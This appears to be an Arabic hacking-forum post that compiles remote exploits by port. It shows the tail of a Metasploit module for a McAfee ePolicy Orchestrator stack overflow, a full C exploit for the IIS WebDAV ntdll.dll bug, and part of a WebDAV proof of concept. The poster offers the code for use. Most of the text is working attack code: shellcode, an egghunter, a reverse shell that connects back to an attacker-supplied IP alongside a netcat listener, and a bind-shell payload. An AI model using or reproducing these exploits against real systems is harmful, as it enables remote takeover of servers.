'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 81],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
# Space is almost unlimited, but 1024 is fine for now
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\x ff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0
and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
This module is based on the exploit by xbxice and muts.
}),
'Refs' =>
[
['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
],
'Keys' => ['epo'],
'DisclosureDate' => 'Jul 17 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
# Use a egghunter stub to find the payload
my $eggtag = Pex::Text::AlphaNumText(4);
my $egghunt =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
$eggtag .
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
# Create the 64-byte GUID
my $guid = Pex::Text::AlphaNumText(64);
# Create the 260 byte Source header
my $evil = Pex::Text::AlphaNumText(260);
#
# A long Source header results in a handful of exceptions.
# The first exception occurs with a pointer at offset 116.
# This exception occurs because a function pointer is
# dereferenced from the overwritten data and then called:
# naisp32!naSPIPE_MainWorkFunc+0x3ed:
# mov ecx, [eax+0x270] (eax is offset 116)
# push ecx
# call [eax+0x26c]
#
# When this happens, the first SEH in the chain is also
# overwritten at offset 96, so the exception results
# in our code being called. If we knew of an address
# in memory that pointed to our shellcode, we could
# avoid the SEH completely and use the above call to
# execute our code. This is actually practical, since
# we can upload almost arbitrary amounts of data into
# the heap and then overwrite the function pointer above.
#
# This method is left as an excercise to the reader.
#
# This module will use the SEH overwrite with a pop/pop/ret or
# a jmp/call ebx (2000 only) to gain control of execution. This
# removes the need for a large data upload and should result in
# reliable execution without the need to brute force.
#
# Since the SEH method only leaves ~140 bytes of contiguous
# shellcode space, we use an egghunter to find the real
# payload that we stuffed into the heap as POST data.
#
# Trigger the exception by passing a bad pointer
substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");
# Return to pop/pop/ret or *****alent
substr($evil, $target->[1], 4, pack('V', $target->[2]));
# Jump to the egghunter
substr($evil, $target->[1] - 4, 2, "\xeb\x1a");
# Egghunter has 140 bytes of room to work
substr($evil, $target->[1] + 24, length($egghunt), $egghunt);
# Create our post data containing the shellcode
my $data = Pex::Text::AlphaNumText(int(rand(500)+32));
# Embed the search tag and shellcode
$data .= ($eggtag x 2) . $shellcode;
# Add some extra padding
$data .= Pex::Text::AlphaNumText(int(rand(500)+32));
my $req = "GET /spipe/pkg HTTP/1.0\r\n";
$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
$req .="Content-Length: ". length($data). "\r\n";
$req .="AgentGuid=${guid}\r\n";
$req .="Source=${evil}\r\n";
$req .= "\r\n";
$req .= $data;
$self->PrintLine(sprintf(" Trying ".$target->[0]." using 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($req);
$self->PrintLine(" Waiting up to two minutes for the egghunter...");
$s->Recv(-1, 120);
$self->Handler($s);
$s->Close;
return;
}
1;
# [2006-10-01]
انتهينا من طرح بورت 81 و 80
شباب لقد تم تجميع ثغرات البورتات وترتيبها
من قبلي لذا
ارجو حفظ الحقوق لجيوش الهكر
تحياتي :wink:
السلام عليكم و رحمة الله و بركاته
إن شاء الله تكونو في افضل حال
مثل ما قلت لكم لدينا 114 بورت و لكل بورت ثغراتها
طرحنا ثمانيه بورتات 21 و 22 و 23 و 25 و 42 و 53 و 69 و 70
و الان سنطرح بورت 80 و 81 وبكذا كملنا 10 بورتات وبقي لدينا 104
الخير كثير:wink:
بقول بسم الله الرحمن الرحيم
نبداء بـ بورت 80
80 MS Windows WebDAV (ntdll.dll) Remote Exploit
/************************************************** *****************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/************************************************** *****************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x 25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x 5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x b5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\x f3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x 8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x 58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x 00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x 5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\x f5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x 78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x 13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x 1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x 55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x 81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\x ff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\x c9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x 00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x 08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x 45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x 5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x 00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\x c4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x 00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x 00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WS ASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";
int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";
if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}
if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}
sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
printf("Checking WebDav on '%s' ... ",host);
if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}
void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}
void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
if(test_host(argv[1]))
return;
if(argc==5)
PAD+=atoi(argv[4]);
printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
ip = inet_addr(argv[2]); ip1 = (char*)&ip;
shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];
port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];
// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);
/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}
// [2003-03-23]
80 MS Windows WebDAV Remote PoC Exploit
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt <[email protected]> */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ================================================== ==================
* --[ READ ME ]
*
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port
* at the victim machine so it could be problematic if that machine is protected behind a firewall.
* For all these reasons, the scope of this code is limited and mainly intended for educational
* purposes. I am not responsible of possible damages created by the use of this exploit code.
*
* The program sends a HTTP request like this:
*
* SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1
* {HTTP headers here}
* {HTTP body with webDAV content}
* 0x01 [shellcode]
*
* IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for
* instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot include code here
* (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at
* least using the common method. Another problem that we will have to live with is our RET value
* being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the
* one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction.
*
* We have two alternatives:
*
* 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to
* the Unicode form) in process memory. Problem: normally we should find it by debugging the
* vulnerable application and then hardcode the found address (which will be the RET address)
* in our exploit code. This RET address is variable, even for the same version of OS and app
* (I mean, different instances of the same application in the same machine could make the
* guessed RET address invalid at different moments). Now add the restriction of RET value
* padded with null-bytes. Anyway, the main advantage of this method is that we will not have
* to deal with 0x00-padded shellcode.
*
* 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app
* expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is
* automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper
* to read more about this. Dave Aitel also has a good paper about this technique and indeed
* he released code written in Python to encode shellcode (I'm wondering if he will release a
* working tool for that purpose, since the actual code was released as part of a commercial
* product, so it cannot be run without buying the whole product, despite the module itself
* being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over-
* flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode
* lives in), so we don't need to guess the address where shellcode will be placed and the
* chance of a successful exploitation is greatly improved. For instance, in this case, when
* IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in
* RET value with the fixed address of code like "call %ecx". This code may be contained in
* any previosly-loaded library, for example).
*
* Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit
* using method 2, but I cannot promise that.
*
* Let's see another problem of the method 1 (which I have used). Not all Unicode conversions
* result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f
* (except for some few special characters, I'm not sure). But our shellcode will have bytes
* greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing
* our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result,
* sometimes the exploit may not work, because no exact length is matched. For instance, if you
* carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when
* entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536.
* But with different values seems NOT to work. So matching the exact length is important here!
*
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The
* jumpcode is placed into the "critical" place and has a fixed length, so our string has always
* a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP
* request (so you can insert your own shellcode and remove the one I'm using here, with no apparent
* problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks
* the beginning of the shellcode and it is used by the jumpcode to find the address where shell-
* code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP
* headers have a variable length (think about the "Host:" header and you will understand what
* I'm saying). Well, really, the exploit could have calculated the relative jump itself (other
* problems arise like null-bytes possibly contained in the offset field) but I have prefered to
* use the 0x01 trick. It's my exploit, it's my choice :-)
*
* After launching the exploit, several things may happen:
* - the exploit is successful. You can connect to the bound port of victim machine and get a
* shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro-
* cess will be terminated. This implies that IIS could die.
* - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable
* or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be
* exploited via GET, probably) or webDAV is disabled at all.
* - exploit did not get success (which is not strange, since it is not easy to guess RET value)
* but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be
* needed in the victim machine, in order to restart the WWW service.
*
* The following log shows a correct exploitation:
*
* roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c
* roman@goliat:~/iis5webdav> ./rs_iis roman
* Resolving hostname ...
* Attacking port 80 at roman (EIP = 0x00480004)...
* Now open another console/shell and try to connect (telnet) to victim port 31337...
*
* roman@goliat:~/iis5webdav> telnet roman 31337
* Trying 192.168.0.247...
* Connected to roman.
* Escape character is '^]'.
* Microsoft Windows 2000 [VersiA¢n 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
*
* I am not going to show logs for the faulty cases. I'm pretty sure you will see them very
* soon :-) But yes, the exploit works, perhaps a little fine-tunning may be required, though.
* So please, do NOT contact me telling that the exploit doesn't work or things like that. It
* worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the
* victim machine and then launch the exploit against it. Debugger will break when the first
* exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded
* RET value) and resume execution until you reach that point. Finally, it's time to search
* the memory looking for our shellcode. It is nearly impossible (very low chance) that our
* shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction
* imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode
* where you could point to. If EIP is overwritten with the address of such a NOP, program flow
* will finish reaching our shellcode. Note also that among the two bytes of RET that we have some
* kind of control, the more important is the first one, i.e. the more significant. In other
* words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because
* its weight is minimal (256 between aprox. 65000 NOP's is not appreciable).
*
*
* My best wishes,
* --Roman
*
* ===================================== --[ EOT ]-- ====================
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
// Change to fit your need
#define RET 0x4804 // EIP = 0x00480004
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
// Don't change this
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
#define MAXBUF 100000
/*
* LoadLibraryA IT Address := 0100107C
* GetProcAddress IT Address := 01001034
*/
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
* xor al, al
* inc al
* repnz scasb
* jmp edi
*/
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \
